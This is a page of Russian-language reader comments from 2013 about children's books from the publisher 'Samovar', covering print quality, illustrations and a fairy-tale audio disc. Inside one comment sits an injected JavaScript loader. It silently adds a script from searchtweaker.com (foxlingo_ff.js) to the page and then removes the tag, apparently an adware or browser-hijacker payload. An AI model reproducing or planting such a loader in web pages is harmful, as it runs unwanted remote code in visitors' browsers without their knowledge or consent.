Самовар

нам очень книги этого издательства. цена-качество соотносятся, но все же  плюсов больше. Для детей (особенно малышей) замечательные,а поскольку многие еще не умеют читать, а чаще просто рвут (у нас  многие книги скотчем отремонтированы), то все просто идеально)) нам пока рановато красивые коллекционные книги, а культура  уже просится наружу) Еще у нас есть замечательный диск от этого издательства с народными сказками, озвученный народными артистами.
18.12.2013
у нас есть Шумелки, что-то пока не пошли, качество печати неплохое. Недавно видела в магазине Союзпечати "самоварные" книги маленького формата, полистала - понравилось несколько, не избитые стихи, удобный формат, можно бросить в сумку и читать в поликлинике, в машине, куплю и отпишусь.
22.10.2013
Пушкин у нас такой есть. Иллюстрации напечатаны очень плохо: все лица красные.
22.10.2013
Да, я читала про плохое качество печати в этой книги, очень жаль, вот и думаю покупать ли[removed](function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="//www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();[removed]
22.10.2013
И снова наши развивашки. Книжный интернет магазин в Украине